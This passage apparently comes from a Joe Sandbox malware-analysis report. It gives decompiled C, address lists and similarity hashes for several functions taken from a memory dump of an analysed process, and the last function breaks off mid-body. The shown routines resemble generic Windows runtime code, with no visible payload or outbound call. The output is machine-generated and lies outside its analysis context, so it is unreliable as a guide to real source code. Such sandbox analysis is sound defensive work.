                                                    0x00ae0f31
                                                    0x00ae0f35
                                                    0x00ae0f39
                                                    0x00ae0f3a
                                                    0x00ae0f3c
                                                    0x00ae0f3f
                                                    0x00ae0f50
                                                    0x00ae0f55
                                                    0x00ae0f55
                                                    0x00ae0f59
                                                    0x00a852eb
                                                    0x00a852f1
                                                    0x00a852f1
                                                    0x00ae0e7d
                                                    0x00ae0e84
                                                    0x00ae0e88
                                                    0x00ae0e8a
                                                    0x00ae0e8d
                                                    0x00ae0e9e
                                                    0x00ae0ea3
                                                    0x00ae0ea3
                                                    0x00ae0ea7
                                                    0x00ae0eaf
                                                    0x00ae0eb3
                                                    0x00ae0eb9
                                                    0x00ae0eb9
                                                    0x00ae0ebc
                                                    0x00ae0ecd
                                                    0x00ae0ecd
                                                    0x00000000
                                                    0x00ae0eb3
                                                    0x00ae0e21
                                                    0x00ae0e2b
                                                    0x00ae0e2f
                                                    0x00ae0e30
                                                    0x00ae0e3a
                                                    0x00ae0e3f
                                                    0x00ae0e41
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae0e47
                                                    0x00000000
                                                    0x00ae0e47
                                                    0x00ae0df9
                                                    0x00ae0dfe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae0dfe
                                                    0x00a85303
                                                    0x00a85307
                                                    0x00000000
                                                    0x00a85309
                                                    0x00000000
                                                    0x00a85309
                                                    0x00a85307
                                                    0x00a852e9
                                                    0x00a852e9
                                                    0x00000000
                                                    0x00a852e9
                                                    0x00a8530e
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 042bbe8fe44cc52b5e52fc9d809744d35d770c4d76fbbd2753446619cc74bda4
                                                    • Instruction ID: 18ab267cc16c847fdf88cf13f6ed012ec85ee526520808e873ab402428db3d4e
                                                    • Opcode Fuzzy Hash: 042bbe8fe44cc52b5e52fc9d809744d35d770c4d76fbbd2753446619cc74bda4
                                                    • Instruction Fuzzy Hash: 7B51CB31249741EBC721EF69CA42B27BBE4FF50710F14491EF899876A2EB70E844C792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB2AE4 Relevance: .2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AB2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0xb78204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0xb78208; // 0xb78207
				_t8 = _t57 + 0xb78208; // 0xb78207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0xb78450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0xb7821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0xb76d5c; // 0x7ffd0654
							_t72 =  *0xb76d5c; // 0x7ffd0654
							_t75 =  *0xb76d5c; // 0x7ffd0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0xb76d5c; // 0x7ffd0654
							_t84 =  *0xb76d5c; // 0x7ffd0654
							_t87 =  *0xb76d5c; // 0x7ffd0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E00ACF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                    0x00ab2ae4
                                                    0x00ab2aec
                                                    0x00ab2aef
                                                    0x00ab2af4
                                                    0x00ab2af7
                                                    0x00ab2afd
                                                    0x00ab2b92
                                                    0x00ab2b92
                                                    0x00ab2b97
                                                    0x00ab2b9c
                                                    0x00ab2b9c
                                                    0x00ab2b03
                                                    0x00ab2b06
                                                    0x00ab2b09
                                                    0x00ab2b09
                                                    0x00ab2b0f
                                                    0x00ab2b15
                                                    0x00ab2b15
                                                    0x00ab2b1b
                                                    0x00ab2b1e
                                                    0x00ab2b21
                                                    0x00ab2b26
                                                    0x00ab2b29
                                                    0x00ab2b81
                                                    0x00ab2b84
                                                    0x00ab2c0e
                                                    0x00ab2c15
                                                    0x00ab2c24
                                                    0x00ab2c24
                                                    0x00ab2b8a
                                                    0x00ab2b8a
                                                    0x00ab2b8a
                                                    0x00ab2b8a
                                                    0x00ab2b90
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2b4a
                                                    0x00ab2b4a
                                                    0x00ab2b4d
                                                    0x00ab2b53
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2b55
                                                    0x00ab2b58
                                                    0x00ab2bb7
                                                    0x00af5d1b
                                                    0x00af5d37
                                                    0x00af5d47
                                                    0x00af5d53
                                                    0x00ab2bbd
                                                    0x00ab2bbd
                                                    0x00ab2bbd
                                                    0x00ab2bb7
                                                    0x00ab2b5d
                                                    0x00ab2c2f
                                                    0x00af5d5b
                                                    0x00af5d77
                                                    0x00af5d87
                                                    0x00af5d93
                                                    0x00ab2c35
                                                    0x00ab2c35
                                                    0x00ab2c35
                                                    0x00ab2c2f
                                                    0x00ab2b65
                                                    0x00ab2b9f
                                                    0x00ab2ba2
                                                    0x00ab2b67
                                                    0x00ab2b67
                                                    0x00ab2b69
                                                    0x00ab2b6b
                                                    0x00ab2b6e
                                                    0x00ab2bc9
                                                    0x00ab2bcc
                                                    0x00ab2bcf
                                                    0x00ab2bd4
                                                    0x00ab2bd6
                                                    0x00ab2bd6
                                                    0x00ab2bdb
                                                    0x00ab2c02
                                                    0x00ab2c05
                                                    0x00ab2c07
                                                    0x00000000
                                                    0x00ab2c07
                                                    0x00ab2be0
                                                    0x00ab2c00
                                                    0x00ab2c3f
                                                    0x00ab2c3f
                                                    0x00000000
                                                    0x00ab2c00
                                                    0x00ab2be5
                                                    0x00ab2be7
                                                    0x00ab2bec
                                                    0x00ab2bf4
                                                    0x00ab2bf6
                                                    0x00000000
                                                    0x00ab2bf6
                                                    0x00ab2b70
                                                    0x00ab2b76
                                                    0x00ab2b2b
                                                    0x00ab2b2b
                                                    0x00ab2b2d
                                                    0x00ab2b2f
                                                    0x00ab2b32
                                                    0x00ab2b35
                                                    0x00ab2b3a
                                                    0x00000000
                                                    0x00ab2b40
                                                    0x00ab2b43
                                                    0x00ab2b45
                                                    0x00ab2b47
                                                    0x00ab2b4a
                                                    0x00ab2b4d
                                                    0x00ab2b53
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2b53
                                                    0x00ab2b78
                                                    0x00ab2b78
                                                    0x00ab2b7b
                                                    0x00ab2b7e
                                                    0x00000000
                                                    0x00ab2b7e
                                                    0x00ab2b76
                                                    0x00ab2ba5
                                                    0x00ab2ba5
                                                    0x00ab2ba8
                                                    0x00ab2bad
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab2baf
                                                    0x00ab2baf
                                                    0x00ab2bc2
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87fed1f9b2a433966f13ca94bb9d3f53e9ab0c0a0b0c95e8d9b89bfcd292f827
                                                    • Instruction ID: 6944a395bf200e4f30b34b7e664f1324775da776abfd3028796a7ac8edfddf85
                                                    • Opcode Fuzzy Hash: 87fed1f9b2a433966f13ca94bb9d3f53e9ab0c0a0b0c95e8d9b89bfcd292f827
                                                    • Instruction Fuzzy Hash: 9B519F76B001158FCB18CF1DC890AFDB7B5FB88700716855BE8569B326DB34AE51DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AADBE9 Relevance: .1, Instructions: 149COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E00AADBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E00A8CC50(E00A84510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E00AA7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E00B58ED6(_t102, _t98);
						}
						_t76 = _v44;
						E00AA2280(_t58, _v44);
						E00AADD82(_v44, _t102, _t98);
						E00AAB944(_t102, _v5);
						return E00A9FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0xb78628; // 0x0
							_v28 = _t67;
							_t68 =  *0xb7862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0xb78628; // 0x0
						_t105 = _v28;
						_t80 =  *0xb7862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0xb4fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                    0x00aadbe9
                                                    0x00aadbf2
                                                    0x00aadbf7
                                                    0x00aadbf9
                                                    0x00aadbfc
                                                    0x00aadc00
                                                    0x00aadc03
                                                    0x00aadc14
                                                    0x00aadd54
                                                    0x00aadd54
                                                    0x00aadd54
                                                    0x00aadc18
                                                    0x00aadc1d
                                                    0x00aadc1d
                                                    0x00aadc32
                                                    0x00aadc3b
                                                    0x00aadc3e
                                                    0x00aadc46
                                                    0x00aadd5b
                                                    0x00aadd62
                                                    0x00aadd64
                                                    0x00aadd67
                                                    0x00aadd69
                                                    0x00aadd6b
                                                    0x00aadd6e
                                                    0x00aadd70
                                                    0x00aadd73
                                                    0x00aadd73
                                                    0x00000000
                                                    0x00aadc4c
                                                    0x00aadc4e
                                                    0x00af3ae3
                                                    0x00af3ae8
                                                    0x00af3aea
                                                    0x00aadce7
                                                    0x00aadce9
                                                    0x00aadcec
                                                    0x00aadcee
                                                    0x00aadcf0
                                                    0x00aadcf3
                                                    0x00aadcf5
                                                    0x00af3af2
                                                    0x00af3af5
                                                    0x00af3af5
                                                    0x00aadd06
                                                    0x00aadd08
                                                    0x00aadd0b
                                                    0x00aadd12
                                                    0x00af3b08
                                                    0x00aadd18
                                                    0x00aadd18
                                                    0x00aadd18
                                                    0x00aadd20
                                                    0x00aadd23
                                                    0x00af3b16
                                                    0x00af3b16
                                                    0x00aadd29
                                                    0x00aadd2d
                                                    0x00aadd36
                                                    0x00aadd40
                                                    0x00aadd51
                                                    0x00aadd51
                                                    0x00aadc54
                                                    0x00aadc59
                                                    0x00aadc59
                                                    0x00aadc5e
                                                    0x00aadc5e
                                                    0x00aadc63
                                                    0x00aadc66
                                                    0x00aadc6b
                                                    0x00aadc78
                                                    0x00aadc7b
                                                    0x00aadc81
                                                    0x00aadc81
                                                    0x00aadc83
                                                    0x00aadc89
                                                    0x00000000
                                                    0x00000000
                                                    0x00aadd7b
                                                    0x00aadd7b
                                                    0x00aadc8f
                                                    0x00aadc8f
                                                    0x00aadc92
                                                    0x00aadc99
                                                    0x00aadc9f
                                                    0x00aadca5
                                                    0x00aadcaa
                                                    0x00aadcaa
                                                    0x00aadcb3
                                                    0x00aadcb8
                                                    0x00aadcbb
                                                    0x00aadcc1
                                                    0x00aadccf
                                                    0x00aadcd2
                                                    0x00aadcd5
                                                    0x00aadcd7
                                                    0x00aadcda
                                                    0x00aadcdc
                                                    0x00aadcdc
                                                    0x00aadce2
                                                    0x00aadce4
                                                    0x00000000
                                                    0x00aadce4

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ef0524a99007aa8a1f1da065ca36b039ed2ba64b8cbe5dafd66eb707d765c62
                                                    • Instruction ID: 974484e8419e5374a74b1415a25876d79a5e2813dfc09073d77454d2e6d062eb
                                                    • Opcode Fuzzy Hash: 5ef0524a99007aa8a1f1da065ca36b039ed2ba64b8cbe5dafd66eb707d765c62
                                                    • Instruction Fuzzy Hash: 76519171A01615DFCB14DFA8C580AAEBBF1BF49310F208559E59AA7784DB31AD44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A9EF40 Relevance: .1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E00A9EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E00A89080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7709c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E00A82D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                    0x00a9ef4b
                                                    0x00a9ef4d
                                                    0x00a9ef57
                                                    0x00a9f0bd
                                                    0x00a9f0c2
                                                    0x00a9f0d2
                                                    0x00a9f0d2
                                                    0x00a9f0c2
                                                    0x00a9ef5d
                                                    0x00a9ef5f
                                                    0x00a9ef67
                                                    0x00a9ef6a
                                                    0x00a9ef6d
                                                    0x00a9ef74
                                                    0x00a9ef7f
                                                    0x00a9ef82
                                                    0x00a9ef82
                                                    0x00a9ef86
                                                    0x00a9ef88
                                                    0x00a9ef8c
                                                    0x00a9ef8f
                                                    0x00a9ef8f
                                                    0x00a9ef8f
                                                    0x00000000
                                                    0x00a9ef91
                                                    0x00a9ef93
                                                    0x00a9efc4
                                                    0x00a9efc4
                                                    0x00a9efc4
                                                    0x00a9efca
                                                    0x00a9efd0
                                                    0x00a9f0a6
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9f0af
                                                    0x00aebb06
                                                    0x00aebb0a
                                                    0x00a9f0b5
                                                    0x00a9f0b5
                                                    0x00a9f0b5
                                                    0x00a9f0b5
                                                    0x00000000
                                                    0x00a9efd6
                                                    0x00a9efd9
                                                    0x00a9f0de
                                                    0x00a9f0e2
                                                    0x00a9efdf
                                                    0x00a9efdf
                                                    0x00a9efdf
                                                    0x00a9efe5
                                                    0x00aebafc
                                                    0x00aebafc
                                                    0x00a9efe5
                                                    0x00a9efeb
                                                    0x00a9efed
                                                    0x00a9f00f
                                                    0x00a9f011
                                                    0x00a9f01a
                                                    0x00a9f01d
                                                    0x00a9f021
                                                    0x00a9f028
                                                    0x00a9f029
                                                    0x00a9f029
                                                    0x00a9f02c
                                                    0x00000000
                                                    0x00a9f02c
                                                    0x00a9eff3
                                                    0x00a9eff9
                                                    0x00a9f0ea
                                                    0x00a9f0ed
                                                    0x00a9f0ef
                                                    0x00000000
                                                    0x00a9f0ef
                                                    0x00a9f003
                                                    0x00aebb12
                                                    0x00a9f045
                                                    0x00a9f049
                                                    0x00a9f051
                                                    0x00a9f09e
                                                    0x00a9f0a0
                                                    0x00a9f0a0
                                                    0x00a9f09e
                                                    0x00a9f053
                                                    0x00a9f064
                                                    0x00a9f064
                                                    0x00a9f06b
                                                    0x00aebb1a
                                                    0x00aebb1a
                                                    0x00a9f071
                                                    0x00a9f071
                                                    0x00a9f07d
                                                    0x00a9f082
                                                    0x00a9f08f
                                                    0x00a9f08f
                                                    0x00a9f009
                                                    0x00a9f00d
                                                    0x00000000
                                                    0x00a9f00d
                                                    0x00a9efd0
                                                    0x00a9ef97
                                                    0x00a9efa5
                                                    0x00a9efaa
                                                    0x00000000
                                                    0x00a9efac
                                                    0x00a9efac
                                                    0x00a9efac
                                                    0x00000000
                                                    0x00a9efb2
                                                    0x00a9f036
                                                    0x00a9f03a
                                                    0x00a9f040
                                                    0x00a9f090
                                                    0x00000000
                                                    0x00a9f092
                                                    0x00a9f042
                                                    0x00000000
                                                    0x00a9f042
                                                    0x00a9efb7
                                                    0x00a9efb9
                                                    0x00a9efbc
                                                    0x00a9efb0
                                                    0x00a9efb0
                                                    0x00000000
                                                    0x00a9efbe
                                                    0x00a9efbe
                                                    0x00a9efc1
                                                    0x00000000
                                                    0x00a9efc1
                                                    0x00a9efbc
                                                    0x00a9efaa
                                                    0x00a9ef91

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction ID: 47fd59bc26bd5bf8f88b833174f512627be2f79f806975720c31b17dfb7ec4e0
                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction Fuzzy Hash: 5F510030B04249DFDF20CB69C1947AEBBF1AF15314F2881B9D84597283E375AD89D791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B5740D Relevance: .1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E00B5740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E00ADD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E00ACF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L00AA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
